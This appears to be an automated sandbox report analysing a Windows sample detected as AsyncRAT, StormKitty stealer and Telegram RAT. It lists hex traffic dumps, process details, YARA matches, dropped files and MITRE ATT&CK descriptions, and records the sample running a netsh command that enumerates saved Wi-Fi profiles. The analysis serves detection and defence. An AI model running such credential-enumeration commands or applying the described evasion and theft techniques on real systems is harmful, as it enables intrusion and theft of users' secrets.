2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: 59 eb 3e c3 8e 16 7f b6 de da 55 6f d3 db 1f 68 e3 7c 9e 50 8e 16 31 f5 15 11 f8 d6 ef ab e2 03 aa 30 d6 6b fd 97 7f e6 13 08 d5 53 21 7e 24 d8 93 cf 08 73 d2 fe 4f 16 83 89 9f 74 40 9c 18 52 9c fc d2 47 9c c7 d8 1c 92 08 eb a4 7d 22 97 02 ca 9a 83 02 6e 42 a5 65 4e bd 51 11 08 9d ae ac 25 de 59 10 81 c3 e2 98 62 3e f0 6c d8 0b 5b cf 51 45 98 83 a0 6e b3 1f 76 32 b3 8e 22 fb eb a7 ab d9 79 82 cf 07 11 b9 17 07 d5 c4 8b 6e db b2 0b b4 98 f8 80 46 ee 92 06 3b d1 b9 91 92 e3 fc d3 e4 13 9c a4 bf 51 60 0a 92 c8 a4 95 2c 2c 80 08 40 b4 73 40 c0 08 44 03 a5 0d 66 65 52 83 0a 53 e9 ca 45 b5 f0 09 0c 24 d2 bb 81 49 cb 30 f0 54 5f 2d 0f c7 a4 d4 4a 00 32 2a bc 89 c3 b0 ab 82 12 17 69 b3 ec 20 ea 28 5f 01 88 52 73 ab 16 bf b3 1f 8c 78 83 f2 0a 60 b2 6c af a4 62 56 Data Ascii: Y>Uoh\|P10kS!~$sOt@RG}"nBeNQ%Yb>l[QEnv2"ynF;Q`,,@s@DfeRSE$I0T_-J2*i (_Rsx`lbV
2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: 49 48 b7 84 11 67 9e 6f dc 09 bc 16 6b b4 07 73 5c 2f 14 de 69 b4 24 0f 35 9c 5d 1b 0b a4 a2 fb 60 6d f5 49 43 a2 83 ff 9a fc 2f 20 e8 01 20 bd bb 5d a4 48 e3 22 ab 12 26 3c 51 10 78 c5 f2 8e f4 f7 9f 77 2e 0a 55 c7 d4 e9 b8 eb f4 8c e4 0e 3c 36 b4 9b 12 a5 3e 6b 69 6b aa f8 b1 d8 de b1 2a d3 e1 1e 4a 1b 96 30 da bf 76 65 7b 5d 7d 3e 38 58 46 f5 c7 46 d5 aa 8b bb f6 e4 ad 57 71 ad fa d7 19 df 34 f6 0e 8d 27 ae 9f bd 47 6d c0 89 7c 11 38 2c e5 f1 f3 0c 7e 77 4b c2 79 f2 f8 0e 5e b1 3b ef ed 37 59 c4 97 5b 6f 37 7f 13 80 8c 32 02 30 79 a7 c8 4c 2d 7a b9 6c f0 bd cc 97 2e 6f 9f e2 b7 c7 fb 0d e1 07 c3 39 49 8a 3b ed 8f 09 00 9f 87 ed 6f e7 9b 0e 5d c4 7b c2 c1 9f 34 43 69 ca 12 4c b5 91 38 d2 06 c1 04 40 b6 9f af dc 82 00 60 be e1 f7 f1 3e 7b 83 8e 6f 0f e5 Data Ascii: IHgoks\/i$5]`mIC/ ]H"&<Qxw.U<6>kik*J0ve{]}>8XFFWq4'Gm\|8,~wKy^;7Y[o720yL-zl.o9I;o]{4CiL8@`>{o
2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: b1 e9 64 25 95 6d eb 95 4d bf 10 68 6a b3 09 ab a5 f2 bc 3b ed 93 25 99 2c 32 77 27 b6 7a aa 43 c1 9b ba 31 8c 2b c0 24 89 4b 60 f6 19 ec 75 41 90 01 7e 13 1e 93 7b fa 8f be b1 fb 3e 76 c6 ae d6 01 76 eb ca ec 30 01 f8 ae 13 a0 aa 51 12 b5 73 4f 6d 9f 45 48 ac 9a ea 90 06 b9 a3 be 51 f0 c1 97 58 94 8c af 72 9a e6 28 d7 dd e4 f8 59 80 18 0b b4 de 41 16 4b 2f e9 1b 1e f2 41 9e 62 d7 34 2a 21 c4 3a 91 9b 8e 18 62 f2 6c bc 11 d0 cc de 0b 4e 55 b3 24 cf 1b 92 1e 8a 5a e7 0f a7 74 57 73 cc 7c 15 f6 b0 d0 ef e1 e1 66 5a 37 7c bd 20 c1 4d 9f 00 58 f2 1d ba 23 67 8c 40 d0 bd b5 ab c7 86 5f cb 39 14 d3 22 00 8f 26 93 9d 0b df 0e b1 05 95 12 00 0b b4 aa 74 0f 83 56 ec 53 bc 5a 34 1e 56 cf 2f db ed f1 82 bb 2b 20 e2 a4 7d 6c 1c 93 6d f4 86 f6 d8 18 78 95 98 52 a5 31 Data Ascii: d%mMhj;%,2w'zC1+$K`uA~{>vv0QsOmEHQXr(YAK/Ab4*!:blNU$ZtWs\|fZ7\| MX#g@_9"&tVSZ4V/+ }lmxR1
2024-07-31 05:07:19 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Wed, 31 Jul 2024 05:07:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	0
Start time:	01:06:58
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\viVOqZjAT0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\viVOqZjAT0.exe"
Imagebase:	0x790000
File size:	179'200 bytes
MD5 hash:	19F436930646F3E8F283FA71F2A4CBCB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1649299385.0000000000792000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.1649299385.0000000000792000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1649299385.0000000000792000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1649299385.0000000000792000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.1649299385.0000000000792000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1649299385.0000000000792000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.4107117629.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4107117629.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4107117629.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.4107117629.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Target ID:	1
Start time:	01:07:09
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	87
Total number of Limit Nodes:	0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report viVOqZjAT0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\80e522d8316e7da539f08cd83766e5dd\msgid.dat

C:\Users\user\AppData\Local\Temp\places.raw

C:\Users\user\AppData\Local\Temp\tmp37DA.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp37FA.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp380B.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp382B.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp383B.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp386B.tmp.dat

Windows Analysis Report
viVOqZjAT0.exe

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre